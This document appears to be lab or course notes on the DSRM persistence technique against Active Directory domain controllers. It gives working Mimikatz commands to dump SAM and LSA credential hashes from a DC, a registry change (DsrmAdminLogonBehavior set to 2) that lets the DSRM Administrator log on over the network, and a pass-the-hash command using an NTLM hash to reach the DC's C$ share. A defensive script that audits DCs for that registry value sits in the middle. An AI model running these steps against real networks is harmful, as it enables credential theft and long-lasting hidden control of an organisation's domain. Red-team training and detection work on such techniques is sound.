DSRM

If we have admin privileges on a DC, we can dump the hash of the DC's local Administrator (the DSRM account) and then enable network logon for this account so it can be used to access the DC remotely.

DSRM (Directory Services Restore Mode)

  • When Active Directory Domain Services cannot boot, the DC can be started in a safe mode called DSRM, which uses a local administrator account on the DC named "Administrator" whose password is the DSRM password.

  • DSRM password (SafeModePassword) is required when a server is promoted to DC and it is rarely changed. After altering the config on the DC, it is possible to pass the NTLM hash of this user to access the DC.

  • This is the longest-lasting persistence method.

  • The domain DPAPI backup key can be used to decrypt DPAPI protected credentials for any user.

Dump credentials (requires DA privs)

# Load Invoke-Mimikatz into a remoting session on the DC
# (Invoke-Command -FilePath has to run before the session is entered interactively)
$sess = New-PSSession dcorp-dc
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess
Enter-PSSession -Session $sess

# Dump the DC's local SAM; the DSRM Administrator is a local account, so its hash lives here.
# -Computername targets the DC over remoting when Invoke-Mimikatz is loaded on the attacker host instead.
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

Compare the Administrator hash from the SAM dump with the domain Administrator hash returned by the following command:

# Dump domain account hashes from the DC's LSA (NTDS)
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

The first one (from the SAM) is the DSRM local Administrator; the two hashes differ because the DSRM password is set independently of the domain Administrator password.

Since it is a local admin of the DC, we can pass the hash to authenticate.

Before PtH, we need to change the logon behavior for the DSRM account, because by default it may only log on when the DC is booted into DSRM (very noisy).

Enter-PSSession -Computername dcorp-dc

# Check if the value exists and read it. Absent or 0 = logon only in DSRM (default),
# 1 = logon allowed when AD DS is stopped, 2 = logon allowed at any time
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DsrmAdminLogonBehavior

# Change the registry value on the DC (use Set-ItemProperty if the value already exists)
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
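As an added defensive counterpart to the registry change above (not part of the original notes), the following script audits every DC in the current domain for the DsrmAdminLogonBehavior value and flags any DC where it has been changed from the default; it assumes the ActiveDirectory RSAT module and WinRM access to the DCs.

```powershell
# Added example (not from the original notes): audit DsrmAdminLogonBehavior on all DCs.
# Assumes the ActiveDirectory module is installed and WinRM is reachable on each DC.
Import-Module ActiveDirectory

$regPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

$findings = foreach ($dc in (Get-ADDomainController -Filter *)) {
    $raw = Invoke-Command -ComputerName $dc.HostName -ScriptBlock {
        param($path, $name)
        $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
        # An absent value is the default (0): DSRM admin may log on only in DSRM
        if ($null -eq $item) { 0 } else { [int]$item.$name }
    } -ArgumentList $regPath, $valueName -ErrorAction SilentlyContinue

    # -1 marks a DC that could not be queried so it is still reported
    $value = if ($null -eq $raw) { -1 } else { [int]$raw }

    [pscustomobject]@{
        DC         = $dc.HostName
        Value      = $value
        Meaning    = switch ($value) {
            0       { 'Default: logon only when booted into DSRM' }
            1       { 'Logon allowed when AD DS service is stopped' }
            2       { 'Logon allowed at any time (network PtH possible)' }
            default { 'Unreachable or unexpected value' }
        }
        Suspicious = ($value -eq 1 -or $value -eq 2)
    }
}

$findings | Format-Table -AutoSize

# Remediation: remove the override so the default applies again.
# Uncomment only after confirming the change was not made intentionally.
# $findings | Where-Object Suspicious | ForEach-Object {
#     Invoke-Command -ComputerName $_.DC -ScriptBlock {
#         Remove-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DsrmAdminLogonBehavior'
#     }
# }
```

Pair this with a registry audit SACL on the Lsa key so that future changes to the value surface as Event ID 4657 (registry value modified) on the DC.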

Pass the hash

# On attacker machine
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

# Or access C$
ls \\dcorp-dc\C$
